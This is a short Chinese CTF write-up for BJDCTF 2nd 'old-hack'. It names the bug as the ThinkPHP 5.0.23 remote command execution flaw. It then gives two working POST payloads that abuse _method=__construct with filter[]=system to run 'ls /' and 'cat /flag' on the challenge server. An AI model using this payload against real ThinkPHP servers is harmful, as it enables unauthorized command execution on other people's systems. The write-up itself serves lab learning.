zoukankan      html  css  js  c++  java
  • [BJDCTF 2nd]old-hack

    进入首页:
    首页告诉了我们是thinkphp5的漏洞。

    知道了是哪个版本的话就搜一搜喽:最后发现是thinkphp5.0.23的命令执行


    payload_1:查看根目录文件,发现flag位置

    http://90b89500-3ac6-40a5-9f1e-e84e8923115f.node3.buuoj.cn
    POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls /
    

    payload_2:读取flag

    http://90b89500-3ac6-40a5-9f1e-e84e8923115f.node3.buuoj.cn
    POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag
    

  • 相关阅读:
    ThinkPHP
    ThinkPHP
    静态化
    静态化
    静态化
    设计模式
    sublime
    静态化
    OPTIMIZE TABLE 小解
    information_schema系列八(事物,锁)
  • 原文地址:https://www.cnblogs.com/h3zh1/p/12549645.html
Copyright © 2011-2022 走看看